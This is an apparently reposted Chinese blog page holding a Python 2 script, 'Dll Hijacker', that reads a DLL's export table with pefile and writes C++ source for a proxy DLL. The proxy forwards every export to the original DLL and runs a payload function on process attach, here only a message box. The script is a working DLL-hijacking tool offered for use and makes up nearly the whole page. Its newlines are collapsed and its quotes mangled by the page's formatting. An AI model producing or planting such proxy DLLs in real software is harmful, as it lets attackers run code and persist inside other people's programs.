Dll Hijacker
Posted 杀死比特
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Dll Hijacker相关的知识,希望对你有一定的参考价值。
#coding=utf-8 # # Dll Hijacker # # platform: Python 2.x @ Windows # # author:Coca1ne import os,sys,time import pefile def main(): try: pe = pefile.PE(sys.argv[1]) exportTable = pe.DIRECTORY_ENTRY_EXPORT.symbols print "[!]Find export function :[ %d ]\r\n" % len(exportTable) for exptab in exportTable: print "%3s %10s" % (exptab.ordinal, exptab.name) print "\r\n[+] generating DLL Hijack cpp file ..." generate(exportTable) print "\r\n[+] generating DLL Hijack cpp file has finished!" except Exception, e: print e def generate(exportTable): segments = r"//Generate by DLLHijacker.py#include <Windows.h>DEFINE_DLL_EXPORT_FUNC#define EXTERNC extern \"C\"#define NAKED __declspec(naked)#define EXPORT __declspec(dllexport)#define ALCPP EXPORT NAKED#define ALSTD EXTERNC EXPORT NAKED void __stdcall#define ALCFAST EXTERNC EXPORT NAKED void __fastcall#define ALCDECL EXTERNC NAKED void __cdeclnamespace DLLHijacker{ HMODULE m_hModule = NULL; DWORD m_dwReturn[17] = {0}; inline BOOL WINAPI Load() { TCHAR tzPath[MAX_PATH]; lstrcpy(tzPath, TEXT(\"DLL_FILENAME.dll\")); m_hModule = LoadLibrary(tzPath); if (m_hModule == NULL) return FALSE; return (m_hModule != NULL); } inline VOID WINAPI Free() { if (m_hModule) FreeLibrary(m_hModule); } FARPROC WINAPI GetAddress(PCSTR pszProcName) { FARPROC fpAddress; CHAR szProcName[16]; fpAddress = GetProcAddress(m_hModule, pszProcName); if (fpAddress == NULL) { if (HIWORD(pszProcName) == 0) { wsprintf(szProcName, \"%d\", pszProcName); pszProcName = szProcName; } ExitProcess(-2); } return fpAddress; }}using namespace DLLHijacker;VOID Hijack(){ MessageBoxW(NULL, L\"DLL Hijack! by DLLHijacker\", L\":)\", 0);}BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved){ if (dwReason == DLL_PROCESS_ATTACH) { DisableThreadLibraryCalls(hModule); if(Load()) Hijack(); } else if (dwReason == DLL_PROCESS_DETACH) { Free(); } return TRUE;}" filename = sys.argv[1][sys.argv[1].rindex(‘\\‘)+1:sys.argv[1].rindex(‘.‘)] fp = open(filename + ".cpp", "w+") define_dll_exp_func = "" for exptable in exportTable: define_dll_exp_func += r"#pragma comment(linker, \"/EXPORT:" + str(exptable.name) + "=_DLLHijacker_" + str(exptable.name) + ",@"+ str(exptable.ordinal) +"\")\n" segments = segments.replace(‘DLL_FILENAME‘, filename) segments = segments.replace("DEFINE_DLL_EXPORT_FUNC", define_dll_exp_func).replace(‘\\‘,‘‘) fp.writelines(segments) forward_dll_exp_func = "" for exptable in exportTable: forward_dll_exp_func += "ALCDECL DLLHijacker_"+ str(exptable.name) +"(void)\n{" + "\n __asm POP m_dwReturn[0 * TYPE long];\n GetAddress(\""+ str(exptable.name) + "\")();\n __asm JMP m_dwReturn[0 * TYPE long];\n}\r\n" fp.writelines(forward_dll_exp_func) fp.close() def usage(): print "Usage:" print " %s c:\\windows\\system32\\msimg32.dll" % sys.argv[0] if __name__ == "__main__": if(len(sys.argv) <2): usage() else: main()
以上是关于Dll Hijacker的主要内容,如果未能解决你的问题,请参考以下文章
无法找到指定dll库文件skinH_EL.dll中的输出命令skinH_Attach_EX_
解决未能加载文件或程序集“Newtonsoft.Json ...."或它的某一个依赖项。找到的程序集清单定义与程序集引用不匹配。 (异常来自 HRESULT:0x80131040)(代码片段